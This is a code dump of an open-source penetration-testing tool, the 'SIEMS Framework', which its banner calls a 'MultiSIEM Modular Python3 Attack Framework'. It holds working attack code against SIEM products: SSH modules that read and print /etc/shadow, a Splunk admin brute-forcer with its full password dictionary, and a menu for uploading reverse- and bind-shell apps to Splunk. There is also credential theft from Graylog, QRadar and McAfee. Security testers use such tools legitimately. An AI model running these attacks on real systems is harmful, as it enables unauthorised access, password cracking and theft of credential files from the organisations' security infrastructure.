Enter SIEMonster deploy's password: " 22 | + Style.RESET_ALL) 23 | 24 | ssh = paramiko.SSHClient() 25 | ssh.load_system_host_keys() 26 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 27 | try: 28 | ssh.connect(ip, username='deploy', password=password, 29 | banner_timeout=200) 30 | globals.smonster_messages(1) 31 | 32 | commands = [ 33 | ("hostname", "[!] Hostname"), 34 | ("docker ps --format \"table {{.Names}}\t{{.Ports}}\t" 35 | "{{.Status}}\"", "[!] Active Containers"), 36 | ("ls -1 /etc/rc5.d", "[!] List service active"), 37 | ("ifconfig", "[!] Network Configuration"), 38 | ("sudo iptables -nL", "[!] FW Configuration") 39 | ] 40 | 41 | for command in commands: 42 | stdin, stdout, stderr = ssh.exec_command(command[0]) 43 | if stdout != "": 44 | print('') 45 | print(Fore.GREEN + Style.NORMAL + command[1]) 46 | print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL) 47 | for i in stdout.readlines(): 48 | print('[!] ' + i.replace('\n', '')) 49 | 50 | except paramiko.AuthenticationException: 51 | globals.messages(10) 52 | ssh.close() 53 | 54 | # %%%%%%%%%% The End %%%%%%%%%%# 55 | -------------------------------------------------------------------------------- /siemonster/usersso_smonster.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Obtain SO users of SIEMonster with SSH 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | import globals 8 | import paramiko 9 | from colorama import Fore 10 | from colorama import Style 11 | 12 | 13 | # %%%%%%%%%% Functions %%%%%%%%%# 14 | 15 | 16 | def smonster_users_server(ip): 17 | password = input( 18 | Fore.CYAN + Style.NORMAL + "[!] 
Enter SIEMonster deploy's password: " 19 | + Style.RESET_ALL) 20 | 21 | ssh = paramiko.SSHClient() 22 | ssh.load_system_host_keys() 23 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 24 | try: 25 | ssh.connect(ip, username='deploy', password=password, 26 | banner_timeout=200) 27 | std, stdout, stderr = ssh.exec_command("sudo cat /etc/shadow") 28 | std.flush() 29 | shadow_file = stdout.readlines() 30 | globals.smonster_messages(2) 31 | for line in shadow_file: 32 | print('[!] ' + line.replace('\n', '')) 33 | 34 | ssh.close() 35 | 36 | except paramiko.AuthenticationException: 37 | globals.messages(10) 38 | ssh.close() 39 | 40 | 41 | # %%%%%%%%%% The End %%%%%%%%%%# 42 | -------------------------------------------------------------------------------- /siemsframework.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | """ 4 | ------------------------------------------------------------------------------ 5 | SIEMS FRAMEWORK - Agosto 2019 - Yamila Levalle @ylevalle 6 | Actualizacion - Enero 2020 - Diego Espitia @dsespitia 7 | ------------------------------------------------------------------------------ 8 | """ 9 | 10 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 11 | 12 | 13 | import os 14 | import re 15 | import globals 16 | import colorama 17 | 18 | from time import sleep 19 | from colorama import Fore 20 | from colorama import Style 21 | 22 | from graylog.bruteforcegraylog import graylog_brute 23 | from graylog.testcredentialsgraylog import default_web_credentials 24 | from graylog.testcredentialsgraylog import default_ssh_credentials 25 | from graylog.obtainmongodbcredentials import test_mongo_credentials 26 | from graylog.obtaincredentialsrestapi import obtain_ldap_credentials 27 | from graylog.alarmcallback import alarm_callback 28 | from graylog.obtaininputsrestapi import obtain_inputs 29 | 30 | from ossim.bruteforceossim import ossim_brute 31 | from ossim.obtainconfigossim import 
ossim_config 32 | from ossim.maliciousaction import create_policy 33 | 34 | from scanning import input_ip 35 | from scanning import input_port 36 | from scanning import input_net 37 | from scanning import scan_network 38 | from scanning import scan_host 39 | 40 | from splunk.obtainsysteminfo import obtain_system_info 41 | from splunk.obtainpwds import obtain_credentials 42 | from splunk.installshell import install_app 43 | from splunk.bruteforcesplunk import bruteforce_splunk 44 | from splunk.readfile import read_file 45 | from splunk.obtainsplunkinfo import obtain_splunk_info 46 | from splunk.testovacredentials import test_ova_credentials 47 | 48 | from qradar.bruteforceqradar import qradar_brute 49 | from qradar.apikeybruteqradar import qradar_apikeybrute 50 | from qradar.obtainqradarinfo import qradar_info 51 | from qradar.userdbqradar import qradar_usersdb 52 | 53 | from mcafee.bruteforcemcafee import mcafee_brute 54 | from mcafee.bruteforcessh import mcafee_ssh_brute 55 | from mcafee.obtainsysteminfo import mcafee_ssh_info 56 | from mcafee.obtainwebinfo import mcafee_webinfo 57 | from mcafee.obtainuserssystem import mcafee_users_server 58 | 59 | from siemonster.bfssh_smonster import smonster_ssh_bf 60 | from siemonster.systeminfo_smonster import smonster_ssh_info 61 | from siemonster.usersso_smonster import smonster_users_server 62 | 63 | from elasticsiem.bruteforcessh import elastic_ssh_brute 64 | from elasticsiem.sysinfo_elastic import elastic_ssh_info 65 | 66 | # %%%%%%% Context Variables %%%%%%%# 67 | 68 | VERSION = 1.1 69 | SEPARATOR = "[*] {0} [*]".format('=' * 110) 70 | 71 | # %%%%%%%%%%% Functions %%%%%%%%%%%# 72 | 73 | 74 | def banner(): 75 | b = """ 76 | _____ _____ ______ __ __ ______ _ 77 | / ____|_ _| ____| \/ | | ____| | | 78 | | (___ | | | |__ | \ / |___ | |__ _ __ __ _ _ __ ___ _____ _____ _ __| | __ 79 | \___ \ | | | __| | |\/| / __| | __| '__/ _` | '_ ` _ \ / _ \ \ /\ / / _ \| '__| |/ / 80 | ____) |_| |_| |____| | | \__ \ | | | | | (_| | | | 
| | | __/\ V V / (_) | | | < 81 | |_____/|_____|______|_| |_|___/ |_| |_| \__,_|_| |_| |_|\___| \_/\_/ \___/|_| |_|\_\ 82 | 83 | 84 | MultiSIEM Modular Python3 Attack Framework 85 | By ElevenPaths https://www.elevenpaths.com/ 86 | Usage: python3 ./siemsframework.py 87 | """ 88 | print(Fore.CYAN + Style.BRIGHT + b) 89 | 90 | # %%%%%%%%%% Menu %%%%%%%%%# 91 | 92 | 93 | def menus(menu): 94 | globals.messages(1, '') 95 | if menu == 1: 96 | options = enumerate(globals.main_menu, 1) 97 | elif menu == "Splunk": 98 | options = enumerate(globals.splunk_menu, 1) 99 | elif menu == "Graylog": 100 | options = enumerate(globals.graylog_menu, 1) 101 | elif menu == "OSSIM": 102 | options = enumerate(globals.ossim_menu, 1) 103 | elif menu == "QRadar": 104 | options = enumerate(globals.qradar_menu, 1) 105 | elif menu == "McAfee": 106 | options = enumerate(globals.mcafee_menu, 1) 107 | elif menu == "SIEMonster": 108 | options = enumerate(globals.smonster_menu, 1) 109 | elif menu == "ElasticSIEM": 110 | options = enumerate(globals.elastic_menu, 1) 111 | elif menu == 2: 112 | options = enumerate(globals.app_menu, 1) 113 | 114 | for c, i in options: 115 | print(Fore.GREEN + Style.BRIGHT + '\t[' + str(c) + '] ' + i) 116 | 117 | if menu == 1: 118 | print(Fore.GREEN + Style.BRIGHT + '\t[X] Exit') 119 | elif menu == 2: 120 | print(Fore.GREEN + Style.BRIGHT + '\t[X] Return to Attack Menu') 121 | else: 122 | print(Fore.GREEN + Style.BRIGHT + '\t[X] Return to Main Menu') 123 | print(Fore.GREEN + Style.BRIGHT + SEPARATOR) 124 | 125 | choice = input( 126 | Fore.CYAN + Style.NORMAL + "[!] 
Enter your selection: " + Style.RESET_ALL) 127 | return choice 128 | 129 | 130 | # %%%%%%%%%% Menu Choices %%%%%%%%%# 131 | 132 | 133 | def attack_choice(siemdetected, ip, port): 134 | choiceerror = 0 135 | attackchoice = menus(siemdetected) 136 | 137 | if siemdetected == "Splunk": 138 | splunk_attack(attackchoice, ip, port) 139 | elif siemdetected == "Graylog": 140 | graylog_attack(attackchoice, ip, port) 141 | elif siemdetected == "OSSIM": 142 | ossim_attack(attackchoice, ip, port) 143 | elif siemdetected == "QRadar": 144 | qradar_attack(attackchoice, ip, port) 145 | elif siemdetected == "McAfee": 146 | mcafee_attack(attackchoice, ip, port) 147 | elif siemdetected == "SIEMonster": 148 | smonster_attack(attackchoice, ip, port) 149 | elif siemdetected == "ElasticSIEM": 150 | elastic_attack(attackchoice, ip, port) 151 | elif attackchoice.lower() == "x": 152 | main_choice() 153 | else: 154 | globals.messages(2) 155 | sleep(1) 156 | attack_choice(siemdetected, ip, port) 157 | choiceerror = 1 158 | 159 | if attackchoice != "0" and choiceerror != 1: # Not return and not error 160 | choice3 = input( 161 | Fore.CYAN + Style.BRIGHT + 162 | "[!] 
Do you want to return to the attack menu (Y/N): " + 163 | Style.RESET_ALL) 164 | if choice3.lower() == "y": 165 | attack_choice(siemdetected, ip, port) 166 | else: 167 | main_choice() 168 | 169 | 170 | def app_choice(siemdetected, ip, port): 171 | appchoice = menus(2) 172 | if siemdetected == "Splunk": 173 | app_splunk_attack(appchoice, ip, port) 174 | elif appchoice.lower() == "x": # Return 175 | attack_choice(siemdetected, ip, port) 176 | 177 | 178 | def splunk_attack(attackchoice, ip, port): 179 | if attackchoice == "1": # Bruteforce Splunk Admin 180 | bruteforce_splunk(ip, port) 181 | elif attackchoice == "2": # Obtain Server Information 182 | obtain_splunk_info(ip, port) 183 | elif attackchoice == "3": # Obtain System Information 184 | obtain_system_info(ip, port) 185 | elif attackchoice == "4": # Obtain Splunk Passwords 186 | obtain_credentials(ip, port) 187 | elif attackchoice == "5": # Read /etc/shadow 188 | read_file(ip, port) 189 | elif attackchoice == "7": # Upload Malicious App 190 | app_choice("Splunk", ip, port) 191 | elif attackchoice == "8": # Test OVA Credentials 192 | test_ova_credentials(ip) 193 | 194 | 195 | def app_splunk_attack(appchoice, ip, port): 196 | appname = None 197 | if appchoice == "1": # Linux Reverse Shell 198 | appname = "rshell.tar.gz" 199 | elif appchoice == "2": # Linux Bind Shell 200 | appname = "bshell.tar.gz" 201 | elif appchoice == "3": # Windows Reverse Shell 202 | appname = "wrshell.tar.gz" 203 | elif appchoice == "4": # Windows Bind Shell 204 | appname = "wbshell.tar.gz" 205 | elif appchoice == "5": # Windows UF Add User 206 | appname = "wadduser.tar.gz" 207 | elif appchoice == "6": # Windows UF Bind Shell 208 | appname = "wbshellexe.tar.gz" 209 | 210 | if appchoice != "0" and appname: # Not return and valid app selection 211 | install_app(ip, port, appname) 212 | choice3 = input( 213 | Fore.CYAN + Style.BRIGHT + 214 | "[!] 
Do you want to return to the attack menu (Y/N): " 215 | + Style.RESET_ALL) 216 | 217 | if choice3.lower() == "y": 218 | attack_choice('Splunk', ip, port) 219 | else: 220 | main_choice() 221 | 222 | 223 | def graylog_attack(attackchoice, ip, port): 224 | if attackchoice == "1": # Bruteforce Graylog 225 | graylog_brute(ip, port) 226 | elif attackchoice == "2": # Test Default Credentials 227 | default_web_credentials(ip, port) 228 | default_ssh_credentials(ip) 229 | elif attackchoice == "3": # Test MongoDB 230 | test_mongo_credentials(ip) 231 | elif attackchoice == "4": # Obtain credentials from API 232 | obtain_ldap_credentials(ip, port) 233 | elif attackchoice == "5": # Inputs from API 234 | obtain_inputs(ip, port) 235 | elif attackchoice == "6": # Alarm Callback 236 | alarm_callback(ip, port) 237 | 238 | 239 | def ossim_attack(attackchoice, ip, port): 240 | if attackchoice == "1": # Bruteforce OSSIM 241 | ossim_brute(ip, port) 242 | elif attackchoice == "2": # Obtain Configuration 243 | ossim_config(ip, port) 244 | elif attackchoice == "3": # Malicious Policy and Action 245 | create_policy(ip, port) 246 | 247 | 248 | def qradar_attack(attackchoice, ip, port): 249 | if attackchoice == "1": # Bruteforce QRadar 250 | qradar_brute(ip, port) 251 | elif attackchoice == "2": # API Bruteforce QRadar 252 | qradar_apikeybrute(ip, port) 253 | elif attackchoice == "3": # Obtain Information QRadar 254 | qradar_info(ip, port) 255 | elif attackchoice == "4": # Obtain Usernames of Ariel DB QRadar 256 | qradar_usersdb(ip, port) 257 | 258 | 259 | def mcafee_attack(attackchoice, ip, port): 260 | if attackchoice == '1': 261 | mcafee_brute(ip, port) 262 | elif attackchoice == '2': 263 | mcafee_ssh_brute(ip) 264 | elif attackchoice == '3': 265 | mcafee_ssh_info(ip) 266 | elif attackchoice == '4': 267 | mcafee_webinfo(ip, port) 268 | elif attackchoice == '5': 269 | mcafee_users_server(ip) 270 | 271 | 272 | def smonster_attack(attackchoice, ip, port): 273 | if attackchoice == '1': 274 | 
smonster_ssh_bf(ip) 275 | elif attackchoice == '2': 276 | smonster_ssh_info(ip) 277 | elif attackchoice == '3': 278 | smonster_users_server(ip) 279 | 280 | 281 | def elastic_attack(attackchoice, ip, port): 282 | if attackchoice == '1': 283 | elastic_ssh_brute(ip) 284 | elif attackchoice == '2': 285 | elastic_ssh_info(ip) 286 | elif attackchoice == '3': 287 | smonster_users_server(ip) 288 | 289 | 290 | def scan_detect(): 291 | ip = input_ip() 292 | port = input_port() 293 | siemdetected = '' 294 | if (ip and port) != '': 295 | siemdetected = scan_host(ip, port) 296 | else: 297 | globals.messages(3) 298 | sleep(1) 299 | main_choice() 300 | 301 | choice2 = input( 302 | Fore.CYAN + Style.BRIGHT + "[!] Do you want to launch the " + 303 | siemdetected + " attack module (Y/N): " + Style.RESET_ALL) 304 | 305 | if choice2.lower() == "y": 306 | if port == 0 and siemdetected == "Splunk": 307 | attack_choice(siemdetected, ip, '8089') 308 | elif port == 0 and siemdetected == "Graylog": 309 | attack_choice(siemdetected, ip, '9000') 310 | elif port == 0 and ( 311 | siemdetected == "OSSIM" or siemdetected == "QRadar" 312 | or siemdetected == "McAfee" or siemdetected == "SIEMonster"): 313 | attack_choice(siemdetected, ip, '443') 314 | else: 315 | attack_choice(siemdetected, ip, port) 316 | else: 317 | main_choice() 318 | 319 | 320 | def find_siem(): 321 | siemsdetected = {} 322 | siemnet = input_net() 323 | 324 | if re.search(globals.net_val, siemnet): 325 | ips = scan_network(siemnet) 326 | else: 327 | globals.messages(4) 328 | sleep(1) 329 | main_choice() 330 | globals.messages(6) 331 | 332 | for host in ips: 333 | siemdetected = scan_host(host, '0') 334 | siemsdetected[host] = siemdetected 335 | 336 | siemchoice = input( 337 | Fore.CYAN + Style.BRIGHT + 338 | "[!] Enter the IP address of the SIEM to attack: " + 339 | Style.RESET_ALL) 340 | portchoice = input( 341 | Fore.CYAN + Style.BRIGHT + "[!] 
Enter the port of the SIEM to attack: " + 342 | Style.RESET_ALL) 343 | 344 | choice2 = input( 345 | Fore.CYAN + Style.BRIGHT + "[!] Do you want to launch the " + 346 | siemsdetected[siemchoice] + " attack module (Y/N): " + Style.RESET_ALL) 347 | 348 | if choice2.lower() == "y": 349 | attack_choice(siemsdetected[siemchoice], siemchoice, portchoice) 350 | else: 351 | main_choice() 352 | 353 | 354 | def main_choice(): 355 | choice = menus(1) 356 | 357 | if choice == "1": # Scan and Detect SIEM 358 | scan_detect() 359 | elif choice == "2": # Find SIEM on the Network 360 | find_siem() 361 | elif choice.upper() == "X": 362 | quit() 363 | else: 364 | globals.messages(2) 365 | main_choice() 366 | 367 | 368 | # %%%%%%%%%% Main %%%%%%%%%# 369 | 370 | def main(): 371 | os.system('cls' if os.name == 'nt' else 'clear') 372 | colorama.init(autoreset="True") 373 | banner() 374 | main_choice() 375 | 376 | 377 | if __name__ == '__main__': 378 | main() 379 | 380 | # %%%%%%%%%% The End %%%%%%%%%%# 381 | -------------------------------------------------------------------------------- /splunk/bruteforcesplunk.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Splunk Login Bruteforce 4 | 5 | # %%%%%%%%%%% Libraries %%%%%%%%%%%# 6 | 7 | 8 | import os 9 | import sys 10 | import globals 11 | import splunklib.client as client 12 | 13 | sys.path.append('../') 14 | 15 | # %%%%%%%%%%% Functions %%%%%%%%%%%# 16 | 17 | 18 | def bruteforce_splunk(ip, port): 19 | 20 | username = "admin" 21 | __location__ = os.path.realpath(os.path.join( 22 | os.getcwd(), os.path.dirname(__file__))) 23 | file = open(os.path.join(__location__, 'dict.txt')) 24 | bfs = 0 25 | free = 0 26 | defaultpass = 0 27 | 28 | # First Try Default Password "changeme" and Splunk Free Version 29 | 30 | try: 31 | client.connect(host=ip, port=port, username=username, password="") 32 | free = 1 33 | except: 34 | pass 35 | try: 36 | client.connect( 37 | host=ip, 
port=port, username=username, password="changeme") 38 | defaultpass = 1 39 | except: 40 | pass 41 | 42 | if (free and defaultpass) == 0: 43 | for line in file: 44 | splunk_password = line.strip('\n\r') 45 | 46 | try: 47 | client.connect( 48 | host=ip, port=port, 49 | username=username, password=splunk_password) 50 | bfs = 1 51 | break 52 | except: 53 | pass 54 | 55 | if (bfs or free or defaultpass) == 1: 56 | globals.messages(7) 57 | if free == 1: 58 | globals.messages(9, ['admin', 'no password']) 59 | file.close() 60 | elif defaultpass == 1: 61 | globals.messages(9, ['admin', 'changeme']) 62 | file.close() 63 | else: 64 | globals.messages(9, ['admin', splunk_password]) 65 | file.close() 66 | 67 | else: 68 | globals.messages(8) 69 | file.close() 70 | 71 | # %%%%%%%%%% The End %%%%%%%%%%# 72 | -------------------------------------------------------------------------------- /splunk/bshell.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ElevenPaths/siemframework/8b317d152f8ae80565a4ee00106c73ee0e1a3381/splunk/bshell.tar.gz -------------------------------------------------------------------------------- /splunk/dict.txt: -------------------------------------------------------------------------------- 1 | splunk 2 | password 3 | p4ssw0rd 4 | SPLUNK 5 | changeme 6 | admin 7 | splunk123 8 | splunk1 9 | splunk2 10 | splunk3 11 | splunk4 12 | splunk5 13 | splunk6 14 | splunk7 15 | splunk8 16 | splunk9 17 | splunk0 18 | splunk! 19 | splunk@ 20 | splunk# 21 | splunk$ 22 | splunk% 23 | splunk^ 24 | splunk& 25 | splunk* 26 | splunk? 27 | Splunk1 28 | Splunk2 29 | Splunk3 30 | Splunk4 31 | Splunk5 32 | Splunk6 33 | Splunk7 34 | Splunk8 35 | Splunk9 36 | Splunk0 37 | mellivora123 38 | Splunk! 39 | Splunk@ 40 | Splunk# 41 | Splunk$ 42 | Splunk% 43 | Splunk^ 44 | Splunk& 45 | Splunk* 46 | Splunk? 
47 | $plunk1 48 | $plunk2 49 | $plunk3 50 | $plunk4 51 | $plunk5 52 | $plunk6 53 | $plunk7 54 | $plunk8 55 | $plunk9 56 | $plunk0 57 | $plunk! 58 | $plunk@ 59 | $plunk# 60 | $plunk$ 61 | $plunk% 62 | $plunk^ 63 | $plunk& 64 | $plunk* 65 | $plunk? 66 | 5plunk1 67 | 5plunk2 68 | 5plunk3 69 | 5plunk4 70 | 5plunk5 71 | 5plunk6 72 | 5plunk7 73 | 5plunk8 74 | 5plunk9 75 | 5plunk0 76 | 5plunk! 77 | 5plunk@ 78 | 5plunk# 79 | 5plunk$ 80 | 5plunk% 81 | 5plunk^ 82 | 5plunk& 83 | 5plunk* 84 | 5plunk? 85 | sPLUNK1 86 | sPLUNK2 87 | sPLUNK3 88 | sPLUNK4 89 | sPLUNK5 90 | sPLUNK6 91 | sPLUNK7 92 | sPLUNK8 93 | sPLUNK9 94 | sPLUNK0 95 | sPLUNK! 96 | sPLUNK@ 97 | sPLUNK# 98 | sPLUNK$ 99 | sPLUNK% 100 | sPLUNK^ 101 | sPLUNK& 102 | sPLUNK* 103 | sPLUNK? 104 | SPLUNK1 105 | SPLUNK2 106 | SPLUNK3 107 | SPLUNK4 108 | SPLUNK5 109 | SPLUNK6 110 | SPLUNK7 111 | SPLUNK8 112 | SPLUNK9 113 | SPLUNK0 114 | SPLUNK! 115 | SPLUNK@ 116 | SPLUNK# 117 | SPLUNK$ 118 | SPLUNK% 119 | SPLUNK^ 120 | SPLUNK& 121 | SPLUNK* 122 | SPLUNK? 123 | $PLUNK1 124 | $PLUNK2 125 | $PLUNK3 126 | $PLUNK4 127 | $PLUNK5 128 | $PLUNK6 129 | $PLUNK7 130 | $PLUNK8 131 | $PLUNK9 132 | $PLUNK0 133 | $PLUNK! 134 | $PLUNK@ 135 | $PLUNK# 136 | $PLUNK$ 137 | $PLUNK% 138 | $PLUNK^ 139 | $PLUNK& 140 | $PLUNK* 141 | $PLUNK? 142 | 5PLUNK1 143 | 5PLUNK2 144 | 5PLUNK3 145 | 5PLUNK4 146 | 5PLUNK5 147 | 5PLUNK6 148 | 5PLUNK7 149 | 5PLUNK8 150 | 5PLUNK9 151 | 5PLUNK0 152 | 5PLUNK! 153 | 5PLUNK@ 154 | 5PLUNK# 155 | 5PLUNK$ 156 | 5PLUNK% 157 | 5PLUNK^ 158 | 5PLUNK& 159 | 5PLUNK* 160 | 5PLUNK? 161 | splunk11 162 | splunk12 163 | splunk13 164 | splunk14 165 | splunk15 166 | splunk16 167 | splunk17 168 | splunk18 169 | splunk19 170 | splunk10 171 | splunk1! 172 | splunk1@ 173 | splunk1# 174 | splunk1$ 175 | splunk1% 176 | splunk1^ 177 | splunk1& 178 | splunk1* 179 | splunk1? 180 | Splunk11 181 | Splunk12 182 | Splunk13 183 | Splunk14 184 | Splunk15 185 | Splunk16 186 | Splunk17 187 | Splunk18 188 | Splunk19 189 | Splunk10 190 | Splunk1! 
191 | Splunk1@ 192 | Splunk1# 193 | Splunk1$ 194 | Splunk1% 195 | Splunk1^ 196 | Splunk1& 197 | Splunk1* 198 | Splunk1? 199 | $plunk11 200 | $plunk12 201 | $plunk13 202 | $plunk14 203 | $plunk15 204 | $plunk16 205 | $plunk17 206 | $plunk18 207 | $plunk19 208 | $plunk10 209 | $plunk1! 210 | $plunk1@ 211 | $plunk1# 212 | $plunk1$ 213 | $plunk1% 214 | $plunk1^ 215 | $plunk1& 216 | $plunk1* 217 | $plunk1? 218 | 5plunk11 219 | 5plunk12 220 | 5plunk13 221 | 5plunk14 222 | 5plunk15 223 | 5plunk16 224 | 5plunk17 225 | 5plunk18 226 | 5plunk19 227 | 5plunk10 228 | 5plunk1! 229 | 5plunk1@ 230 | 5plunk1# 231 | 5plunk1$ 232 | 5plunk1% 233 | 5plunk1^ 234 | 5plunk1& 235 | 5plunk1* 236 | 5plunk1? 237 | splunk121 238 | splunk122 239 | splunk123 240 | splunk124 241 | splunk125 242 | splunk126 243 | splunk127 244 | splunk128 245 | splunk129 246 | splunk120 247 | splunk12! 248 | splunk12@ 249 | splunk12# 250 | splunk12$ 251 | splunk12% 252 | splunk12^ 253 | splunk12& 254 | splunk12* 255 | splunk12? 256 | Splunk121 257 | Splunk122 258 | Splunk123 259 | Splunk124 260 | Splunk125 261 | Splunk126 262 | Splunk127 263 | Splunk128 264 | Splunk129 265 | Splunk120 266 | Splunk12! 267 | Splunk12@ 268 | Splunk12# 269 | Splunk12$ 270 | Splunk12% 271 | Splunk12^ 272 | Splunk12& 273 | Splunk12* 274 | Splunk12? 275 | $plunk121 276 | $plunk122 277 | $plunk123 278 | $plunk124 279 | $plunk125 280 | $plunk126 281 | $plunk127 282 | $plunk128 283 | $plunk129 284 | $plunk120 285 | $plunk12! 286 | $plunk12@ 287 | $plunk12# 288 | $plunk12$ 289 | $plunk12% 290 | $plunk12^ 291 | $plunk12& 292 | $plunk12* 293 | $plunk12? 294 | 5plunk121 295 | 5plunk122 296 | 5plunk123 297 | 5plunk124 298 | 5plunk125 299 | 5plunk126 300 | 5plunk127 301 | 5plunk128 302 | 5plunk129 303 | 5plunk120 304 | 5plunk12! 305 | 5plunk12@ 306 | 5plunk12# 307 | 5plunk12$ 308 | 5plunk12% 309 | 5plunk12^ 310 | 5plunk12& 311 | 5plunk12* 312 | 5plunk12? 
313 | splunk1231 314 | splunk1232 315 | splunk1233 316 | splunk1234 317 | splunk1235 318 | splunk1236 319 | splunk1237 320 | splunk1238 321 | splunk1239 322 | splunk1230 323 | splunk123! 324 | splunk123@ 325 | splunk123# 326 | splunk123$ 327 | splunk123% 328 | splunk123^ 329 | splunk123& 330 | splunk123* 331 | splunk123? 332 | Splunk1231 333 | Splunk1232 334 | Splunk1233 335 | Splunk1234 336 | Splunk1235 337 | Splunk1236 338 | Splunk1237 339 | Splunk1238 340 | Splunk1239 341 | Splunk1230 342 | Splunk123! 343 | Splunk123@ 344 | Splunk123# 345 | Splunk123$ 346 | Splunk123% 347 | Splunk123^ 348 | Splunk123& 349 | Splunk123* 350 | Splunk123? 351 | $plunk1231 352 | $plunk1232 353 | $plunk1233 354 | $plunk1234 355 | $plunk1235 356 | $plunk1236 357 | $plunk1237 358 | $plunk1238 359 | $plunk1239 360 | $plunk1230 361 | $plunk123! 362 | $plunk123@ 363 | $plunk123# 364 | $plunk123$ 365 | $plunk123% 366 | $plunk123^ 367 | $plunk123& 368 | $plunk123* 369 | $plunk123? 370 | 5plunk1231 371 | 5plunk1232 372 | 5plunk1233 373 | 5plunk1234 374 | 5plunk1235 375 | 5plunk1236 376 | 5plunk1237 377 | 5plunk1238 378 | 5plunk1239 379 | 5plunk1230 380 | 5plunk123! 381 | 5plunk123@ 382 | 5plunk123# 383 | 5plunk123$ 384 | 5plunk123% 385 | 5plunk123^ 386 | 5plunk123& 387 | 5plunk123* 388 | 5plunk123? 
389 | biteme 390 | 1992 391 | london 392 | soccer 393 | william 394 | querty 395 | liverpool 396 | pussy 397 | admin123 398 | whatever 399 | dallas 400 | hockey 401 | test 402 | zaq1zaq1 403 | 1q2w3e 404 | aaaaaa 405 | killer 406 | bandit 407 | ashley 408 | cookie 409 | merlin 410 | trustno1 411 | 1991 412 | ranger 413 | chelsea 414 | banana 415 | jennifer 416 | 1990 417 | amanda 418 | 1989 419 | hunter 420 | nicole 421 | hello 422 | maverick 423 | blahblah 424 | mercedes 425 | corvette 426 | computer 427 | cheese 428 | ferrari 429 | starwars 430 | 1qaz2wsx 431 | andrea 432 | lakers 433 | andrew 434 | 12341234 435 | matthew 436 | robert 437 | 1234 438 | sophie 439 | pepper 440 | joshua 441 | tigger 442 | 55555 443 | jordan 444 | solo 445 | abcdef 446 | letmein 447 | ginger 448 | jessica 449 | 222222 450 | harley 451 | george 452 | summer 453 | thomas 454 | hannah 455 | daniel 456 | buster 457 | baseball 458 | passw0rd 459 | shadow 460 | freedom 461 | bailey 462 | 121212 463 | zxcvbnm 464 | qwerty123 465 | password1 466 | donald 467 | aa123456 468 | charlie 469 | !@#$%^&* 470 | 654321 471 | monkey 472 | 123123 473 | football 474 | abc123 475 | 666666 476 | welcome 477 | admin 478 | princess 479 | iloveyou 480 | qwerty 481 | sunshine 482 | 1234567 483 | 111111 484 | 12345 485 | 12345678 486 | 123456789 487 | password 488 | 123456 489 | admin1 490 | admin2 491 | admin3 492 | admin4 493 | admin5 494 | admin6 495 | admin7 496 | admin8 497 | admin9 498 | admin0 499 | admin! 500 | admin@ 501 | admin# 502 | admin$ 503 | admin% 504 | admin^ 505 | admin& 506 | admin* 507 | admin? 508 | Admin1 509 | Admin2 510 | Admin3 511 | Admin4 512 | Admin5 513 | Admin6 514 | Admin7 515 | Admin8 516 | Admin9 517 | Admin0 518 | Admin! 519 | Admin@ 520 | Admin# 521 | Admin$ 522 | Admin% 523 | Admin^ 524 | Admin& 525 | Admin* 526 | Admin? 527 | @dmin1 528 | @dmin2 529 | @dmin3 530 | @dmin4 531 | @dmin5 532 | @dmin6 533 | @dmin7 534 | @dmin8 535 | @dmin9 536 | @dmin0 537 | @dmin! 
538 | @dmin@ 539 | @dmin# 540 | @dmin$ 541 | @dmin% 542 | @dmin^ 543 | @dmin& 544 | @dmin* 545 | @dmin? 546 | 4dmin1 547 | 4dmin2 548 | 4dmin3 549 | 4dmin4 550 | 4dmin5 551 | 4dmin6 552 | 4dmin7 553 | 4dmin8 554 | 4dmin9 555 | 4dmin0 556 | 4dmin! 557 | 4dmin@ 558 | 4dmin# 559 | 4dmin$ 560 | 4dmin% 561 | 4dmin^ 562 | 4dmin& 563 | 4dmin* 564 | 4dmin? 565 | admin1231 566 | admin1232 567 | admin1233 568 | admin1234 569 | admin1235 570 | admin1236 571 | admin1237 572 | admin1238 573 | admin1239 574 | admin1230 575 | admin123! 576 | admin123@ 577 | admin123# 578 | admin123$ 579 | admin123% 580 | admin123^ 581 | admin123& 582 | admin123* 583 | admin123? 584 | Admin1231 585 | Admin1232 586 | Admin1233 587 | Admin1234 588 | Admin1235 589 | Admin1236 590 | Admin1237 591 | Admin1238 592 | Admin1239 593 | Admin1230 594 | Admin123! 595 | Admin123@ 596 | Admin123# 597 | Admin123$ 598 | Admin123% 599 | Admin123^ 600 | Admin123& 601 | Admin123* 602 | Admin123? 603 | @dmin1231 604 | @dmin1232 605 | @dmin1233 606 | @dmin1234 607 | @dmin1235 608 | @dmin1236 609 | @dmin1237 610 | @dmin1238 611 | @dmin1239 612 | @dmin1230 613 | @dmin123! 614 | @dmin123@ 615 | @dmin123# 616 | @dmin123$ 617 | @dmin123% 618 | @dmin123^ 619 | @dmin123& 620 | @dmin123* 621 | @dmin123? 622 | 4dmin1231 623 | 4dmin1232 624 | 4dmin1233 625 | 4dmin1234 626 | 4dmin1235 627 | 4dmin1236 628 | 4dmin1237 629 | 4dmin1238 630 | 4dmin1239 631 | 4dmin1230 632 | 4dmin123! 633 | 4dmin123@ 634 | 4dmin123# 635 | 4dmin123$ 636 | 4dmin123% 637 | 4dmin123^ 638 | 4dmin123& 639 | 4dmin123* 640 | 4dmin123? 641 | admin121 642 | admin122 643 | admin123 644 | admin124 645 | admin125 646 | admin126 647 | admin127 648 | admin128 649 | admin129 650 | admin120 651 | admin12! 652 | admin12@ 653 | admin12# 654 | admin12$ 655 | admin12% 656 | admin12^ 657 | admin12& 658 | admin12* 659 | admin12? 
